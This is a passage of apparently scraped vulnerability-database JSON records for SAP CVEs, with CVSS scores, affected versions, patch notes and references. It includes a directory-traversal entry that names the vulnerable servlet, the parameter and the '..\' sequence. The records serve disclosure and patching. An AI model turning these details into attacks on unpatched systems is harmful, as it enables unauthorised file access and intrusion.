manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E\u0026Y, KPMG and PwC. \n\nOnapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. \n\nThese solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. \n\nFor more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. \n\n\n\n-- \nThis email and any files transmitted with it are confidential and intended \nsolely for the use of the individual or entity to whom they are addressed. \nIf you have received this email in error please notify the system manager. \nThis message contains confidential information and is intended only for the \nindividual named. If you are not the named addressee you should not \ndisseminate, distribute or copy this e-mail. \nPlease notify the sender immediately by e-mail if you have received this \ne-mail by mistake and delete this e-mail from your system. If you are not \nthe intended recipient you are notified that disclosing, copying, \ndistributing or taking any action in reliance on the contents of this \ninformation is strictly prohibited",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "BID",
"id": "93503"
},
{
"db": "PACKETSTORM",
"id": "139097"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-7437",
"trust": 2.8
},
{
"db": "BID",
"id": "93503",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "139097",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "93503"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "PACKETSTORM",
"id": "139097"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"id": "VAR-201610-0352",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:14:27.347000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2252312",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64792"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/53"
},
{
"trust": 1.7,
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/93503"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7437"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-7437"
},
{
"trust": 0.8,
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-february-2016"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2252312"
},
{
"trust": 0.3,
"url": "http://go.pardot.com/e/127021/-rejected-rfc-function-cal-pdf/tjsv1/33695124"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-7437"
}
],
"sources": [
{
"db": "BID",
"id": "93503"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "PACKETSTORM",
"id": "139097"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "93503"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"db": "PACKETSTORM",
"id": "139097"
},
{
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-11T00:00:00",
"db": "BID",
"id": "93503"
},
{
"date": "2016-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"date": "2016-10-12T16:06:52",
"db": "PACKETSTORM",
"id": "139097"
},
{
"date": "2016-10-13T14:59:12.237000",
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"date": "2016-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-26T00:04:00",
"db": "BID",
"id": "93503"
},
{
"date": "2016-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005422"
},
{
"date": "2016-10-13T23:04:29.103000",
"db": "NVD",
"id": "CVE-2016-7437"
},
{
"date": "2016-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "93503"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver In RFC Vulnerability concealed from refusing to execute function callback",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005422"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-416"
}
],
"trust": 0.6
}
}
var-201704-1573
Vulnerability from variot
A code injection vulnerability exists in SAP TREX / Business Warehouse Accelerator (BWA). The vendor response is SAP Security Note 2419592. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-1573",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "trex",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "trex",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "business warehouse accelerator"
},
{
"model": "netweaver search and classification",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "business warehouse accelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97567"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:trex:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7691"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "97567"
}
],
"trust": 0.3
},
"cve": "CVE-2017-7691",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-7691",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-7691",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7691",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-581",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A code injection vulnerability exists in SAP TREX / Business Warehouse Accelerator (BWA). The vendor response is SAP Security Note 2419592. \nSuccessful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "BID",
"id": "97567"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7691",
"trust": 2.7
},
{
"db": "BID",
"id": "97567",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "97567"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"id": "VAR-201704-1573",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:51:19.664000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - April 2017 (2419592)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"title": "SAP TREX/Business Warehouse Accelerator Fixes for code injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=70172"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/97567"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7691"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7691"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2419592"
}
],
"sources": [
{
"db": "BID",
"id": "97567"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "97567"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97567"
},
{
"date": "2017-05-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"date": "2017-04-11T21:59:00.180000",
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"date": "2017-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-18T00:04:00",
"db": "BID",
"id": "97567"
},
{
"date": "2017-05-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003092"
},
{
"date": "2017-04-17T19:06:15.527000",
"db": "NVD",
"id": "CVE-2017-7691"
},
{
"date": "2017-05-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP TREX / Business Warehouse Accelerator Code injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003092"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-581"
}
],
"trust": 0.6
}
}
var-201604-0660
Vulnerability from variot
Directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the fileName parameter to CrashFileDownloadServlet, aka SAP Security Note 2234971. SAP NetWeaver AS Java Contains a directory traversal vulnerability. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201604-0660",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.1 to 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3976"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "85946"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-3976",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3976",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3976",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201604-099",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-3976",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
